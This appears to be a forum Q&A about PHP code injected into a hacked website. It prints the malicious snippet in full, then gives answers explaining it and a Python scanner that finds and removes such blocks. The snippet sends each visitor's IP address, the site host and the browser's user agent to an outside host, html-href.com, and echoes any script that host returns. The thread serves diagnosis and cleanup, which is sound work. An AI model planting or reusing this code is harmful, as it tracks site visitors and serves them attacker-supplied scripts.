Unauthorized code posted on web pages

Recently, a site I am linked with was hacked, with unauthorized code placed on several pages. I'm just wondering if anyone can shed light on what exactly this code does, and what benefit it brings to the user who posted it on these pages.

    <?php
    #31e3cd#
    error_reporting(0); ini_set('display_errors',0); $wp_okpbo35639 = @$_SERVER['HTTP_USER_AGENT'];
    if (( preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) && !preg_match ('/bot/i', $wp_okpbo35639))){
    $wp_okpbo0935639="http://"."html"."-href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_okpbo35639);
    $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_okpbo0935639);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_35639okpbo = curl_exec ($ch); curl_close($ch);}
    if ( substr($wp_35639okpbo,1,3) === 'scr' ){ echo $wp_35639okpbo; }
    #/31e3cd#
    ?>

Above is the code as it appeared on the pages. I played with this code and it looks like it is getting user information using:

 $_SERVER['HTTP_USER_AGENT'] 

It then combines this into a URL similar to the one below, but with the user information above added to the URL:

 http://html-href.com/href/?ip=::1&referer=localhost&ua= 

I know that curl is used in data transfer, but where exactly is this information sent and what is its purpose?

+7
security php curl cracking
2 answers

The code makes a call to the URL you specified, sending it the user's IP address, the domain of your site, and the user's user agent string. Then it prints on your site any code that it receives from the cURL request. The resulting code can be anything. This can be HTML, JavaScript, or any other client-side code. This is probably not server-side code, as there is no eval() executing the resulting code.

It seems to be designed for Internet Explorer, Chrome and Firefox browsers, but not for scanners / bots.

EDIT: As FDL noted in his comment, this prints only if it receives a string in which the second, third and fourth characters are scr, which means that it probably only prints on the page if it received the <script>.

+7

$_SERVER['HTTP_USER_AGENT'] is used to check the type of web browser (or maybe a crawler) from which the client requests a resource based on the URL. For example, the snippet preg_match ('/Gecko|MSIE/i', $wp_okpbo35639) is used to check whether the browser is a Firefox client (Gecko) or IE (MSIE). But this is not a reliable way to determine the source browser, as user agents can easily be changed or switched.

+1
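For cleaning up after an injection like the one described in the answers above, here is an added example (not code from the question or from either answer): a Python scanner that finds and strips blocks delimited like the one in the question. It assumes other infected files reuse the same `#<6 hex>#` ... `#/<6 hex>#` marker pair; the function names, trait labels and sample input are constructed for this example.

```python
import re

# Assumption: other infections reuse the "#<6 hex>#" ... "#/<6 hex>#" marker
# pair seen in the question, inside their own <?php ... ?> tag.
BLOCK_RE = re.compile(r"<\?php\s*#([0-9a-f]{6})#(.*?)#/\1#\s*\?>", re.S | re.I)

# Traits of the snippet quoted in the question, reported for each match.
TRAITS = {
    "hides_errors": re.compile(r"error_reporting\s*\(\s*0\s*\)"),
    "reads_user_agent": re.compile(r"HTTP_USER_AGENT"),
    "skips_bots": re.compile(r"!\s*preg_match\s*\(\s*'/bot/i'"),
    "remote_fetch": re.compile(r"curl_exec\s*\("),
    "echoes_response": re.compile(r"echo\s+\$\w+\s*;"),
}


def find_injected_blocks(source):
    """Return one finding per marker-delimited block in a PHP source string."""
    return [{
        "marker": m.group(1).lower(),
        "line": source.count("\n", 0, m.start()) + 1,
        "traits": sorted(n for n, rx in TRAITS.items() if rx.search(m.group(2))),
    } for m in BLOCK_RE.finditer(source)]


def strip_injected_blocks(source):
    """Return the source with every marker-delimited block removed."""
    return BLOCK_RE.sub("", source)


# Constructed sample: a template line preceded by a block shaped like the one
# in the question (shortened names, placeholder host instead of the real URL).
SAMPLE = """<?php
#31e3cd#
error_reporting(0); $ua = @$_SERVER['HTTP_USER_AGENT'];
if (preg_match('/Gecko|MSIE/i', $ua) && !preg_match('/bot/i', $ua)) {
    $ch = curl_init("http://placeholder.invalid/");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $r = curl_exec($ch);
}
if (substr($r,1,3) === 'scr') { echo $r; }
#/31e3cd#
?>
<?php get_header(); ?>
"""

if __name__ == "__main__":
    print(find_injected_blocks(SAMPLE))
```

Removing the block does not close the hole that let it be written, so compare cleaned files against a known-good copy and rotate credentials as well.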
